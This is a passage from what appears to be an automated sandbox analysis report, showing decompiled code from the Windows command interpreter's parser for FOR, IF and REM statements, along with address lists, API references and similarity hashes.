							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0x36b980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}

0x0033c6fc
0x0033c703
0x0033c707
0x0033c70c
0x0033c70e
0x0033c711
0x0033c713
0x0033c71c
0x0034af0e
0x0034af1f
0x0034af2e
0x0034af38
0x0034af41
0x0034af44
0x0034af4f
0x0034af51
0x0034af51
0x0034af56
0x0034af5c
0x0034af5d
0x0034af62
0x0034af67
0x0034af68
0x0034af6d
0x0034af6e
0x00000000
0x0033c743
0x0033c745
0x0033c74a
0x0033c74b
0x0033c74b
0x0033c74d
0x0033c752
0x0033c756
0x00000000
0x00000000
0x0033c794
0x0033c797
0x0033c7a1
0x0034ae7e
0x0034ae84
0x0034ae84
0x0033c7a7
0x0033c7a7
0x0033c7a7
0x0033c7a1
0x0033c758
0x0033c75e
0x0034aea1
0x0034aea5
0x0033c781
0x0033c791
0x0033c791
0x0034aeab
0x0034aeaf
0x0034aed5
0x0034aef3
0x0034aefc
0x0033c77f
0x0033c77f
0x00000000
0x0033c77f
0x0034aeb1
0x0034aeb4
0x0034aeb7
0x0034aeb9
0x0034aec5
0x0034aebb
0x0034aebb
0x0034aec0
0x0034aec0
0x0034aeca
0x0034aecd
0x0034aece
0x0034aed2
0x00000000
0x0034aed2
0x0033c764
0x0033c765
0x0033c76a
0x0033c76f
0x0033c770
0x0033c771
0x0033c772
0x0033c777
0x0033c77d
0x00000000
0x0033c77d

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0036B980,00002000,00000000,00000000,?,00000000), ref: 0033C735

Part of subcall function 0033D7D4: wcschr.MSVCRT ref: 0033D7DA

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0036B980,00002000,?), ref: 0033C777
_ultoa.MSVCRT ref: 0034AF0E
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0034AF17
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 0034AF38

Strings

Application, xrefs: 0034AF44
System, xrefs: 0034AF51

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: Application$System
API String ID: 3538039442-3455788185
Opcode ID: 2635d38a74eebb4acfad7ce9b2c5a353d0265ecb090876c2f8d2529c2be297d2
Instruction ID: 7da00d1404fa6960c46c35064ebe0b6a139e1d13e34350ddc238758beb392508
Opcode Fuzzy Hash: 2635d38a74eebb4acfad7ce9b2c5a353d0265ecb090876c2f8d2529c2be297d2
Instruction Fuzzy Hash: 6241B4717413196BDB229B64CC89FEEBBADEB45751F204119FA0AEF180D770AD80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003404A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E003404A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x36fa90 != 0x4000) {
					_t107 =  *0x36faa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E003400B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E00359287(0x50);
							__imp__longjmp(0x36b8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x35d55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x36faa0 - 0x28;
							if( *0x36faa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E0033F030(0x10);
									__eflags =  *0x36faa0 - 0xa;
								} while ( *0x36faa0 == 0xa);
								__eflags = 0;
								E0033F300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E0033DC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E0033F030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E003582EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x36faa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x36faa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x36faa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x36fa8c = 0x1e;
						__esi = E0033E9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x36faa0 = __ax;
							__eax = 0x3f;
							 *0x36faa2 = __ax;
							__eax = 0;
							 *0x36faa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E0033F030(0);
						}
						__edx = 0x2b;
						__eax = E0033DCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0x373cc9;
							__eax = 0x25;
							if( *0x373cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x36faa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x36faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E0033F030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x36faa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x36faa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E0033F030(0);
										__ax =  *0x36faa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E003582EB(__ecx);
												}
												__eax =  *0x36fa8c;
												__ecx = 6 +  *0x36fa8c * 2;
												__eax = E003400B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x36fa8c;
													__edx =  &(( *0x36fa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x36faa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E0033F030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E003582EB(__ecx);
											}
											__ax =  *0x36faa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x36fa8c;
													__ecx = 2 +  *0x36fa8c * 2;
													__eax = E003400B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E00359287(__ecx);
														__imp__longjmp(0x36b8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x36fa8c;
														__edx =  &(( *0x36fa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E00341040(__eax, __edx, 0x36faa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E003582EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x36faa0 - __ax;
							if( *0x36faa0 != __ax) {
								L216:
								__eax = E003582EB(__ecx);
							} else {
								__eax =  *0x36faa2 & 0x0000ffff;
								__eax = iswspace( *0x36faa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0x36faa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E0033D7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0x36fa8c - 3;
										if( *0x36fa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0x36faa0;
							_push(0x36faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00339C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E00339C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0x36faa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00339C73(__ecx, __edx);
							__eax = E00339936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E00339C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0x36faa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E00341040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E0033DC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E003582EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0x36faa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0x36faa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0x36faa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0x36faa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E0033E9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0x36faa0 = __ax;
									__eax = 0x3f;
									 *0x36faa2 = __ax;
									__eax = 0;
									 *0x36faa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E0033F030(0);
								}
								__edx = 0x2c;
								__eax = E0033DCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0x373cc9 - __al;
									if( *0x373cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E0033F300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0x36faa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E0033CDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E0033DC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E003582EB(__ecx);
									}
									__eax = E0033EEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E0033F030(0);
										__edi = 0x36faa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0x36faa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0x36fa8c;
											__ecx =  *0x36fa8c +  *0x36fa8c;
											__eax = E003400B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E00359287(__ecx);
												__imp__longjmp(0x36b8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E003422C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E00341040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0x373cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E003400B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0x373cd4;
															__eax[6] =  *0x373cd4;
															 *0x373cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E00340178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E00359953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0x373d00;
																							__eax = E0034274C(0x373d00, 0x104, L"%d",  *__edi);
																							_push(0x373d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E0033DBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0x373d00;
																						__eax = E0034274C(0x373d00, 0x104, L"%d",  *__edi);
																						_push(0x373d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E0033C5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E0033D937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E0033DB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E0033DBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E0033D120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E00343320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E0033D120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E0033D937();
																									__ecx =  *0x373cf0;
																									__eax = E0035985A( *0x373cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E0033DBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E0033DB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E0033D937();
																											__esi = 0x373d00;
																											E0034274C(0x373d00, 0x104, L"%d",  *__edi) = E0033C5A2(__ecx, 0x2344, 1, 0x373d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E00346FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0x36fa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E00341040(__eax,  *0x36fa8c, 0x36faa0);
												__ecx = 0x2c;
												__eax = E0033DC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E003582EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E0033F300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0x36faa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0x36faa0);
									__esp = __esp + 8;
									__eflags = __eax;
									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0x36faa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0x36faa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E0033E9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0x36faa0 = __ax;
											__eax = 0x3f;
											 *0x36faa2 = __ax;
											__eax = 0;
											 *0x36faa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E0033F030(0);
										}
										__edx = 0x2d;
										__eax = E0033DCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E0033F300(__eax, 0, 0, 0);
											__eax = E0033EEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E0033F030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E0033F300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0x36fa8c;
													__ecx =  *0x36fa8c +  *0x36fa8c;
													__eax = E003400B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E00359287(__ecx);
														__imp__longjmp(0x36b8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0x36fa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E00341040(__eax,  *0x36fa8c, 0x36faa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0x36faa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E0033E9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E0033EEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E0033F030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0x36fa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E003400B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E00359287(__ecx);
														__imp__longjmp(0x36b8b8, 1);
														asm("int3");
														__eflags =  *0x36fa90;
														if( *0x36fa90 != 0) {
															__eax = E003582EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0x36fa88;
														 *0x35d5c8 = 0;
														if( *0x36fa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E00358121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E00341040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0x36faa0;
																__edx = __edx + __ecx;
																__edi = 0x36faa0 - __eax;
																__eflags = 0x36faa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E003402B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E0033F300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}

0x003404a0
0x003404a0
0x003404ab
0x00340557
0x0034055d
0x00340561
0x003405da
0x003405de
0x00000000
0x00000000
0x00000000
0x00000000
0x00340563
0x00340563
0x00340563
0x0034056d
0x0034056f
0x00340571
0x0034852b
0x00348537
0x0034853d
0x0034853e
0x00348541
0x00348543
0x00348546
0x00348548
0x00348548
0x0034854a
0x0034854a
0x0034854c
0x0034854e
0x0034854e
0x00348553
0x00348553
0x00348556
0x0034855a
0x00348560
0x00348560
0x0033480e
0x00340577
0x00340577
0x0034057f
0x003405e9
0x003405ef
0x00340581
0x00340581
0x00340590
0x00340595
0x0034059a
0x0034059a
0x003405a8
0x003405aa
0x003405af
0x003405af
0x003405b9
0x003405bc
0x003405bf
0x003405d0
0x003405d3
0x003405c1
0x003405c6
0x003405cb
0x003405ce
0x003405e0
0x003405e0
0x003405e5
0x003405e8
0x00000000
0x00000000
0x00000000
0x003405ce
0x003405bf
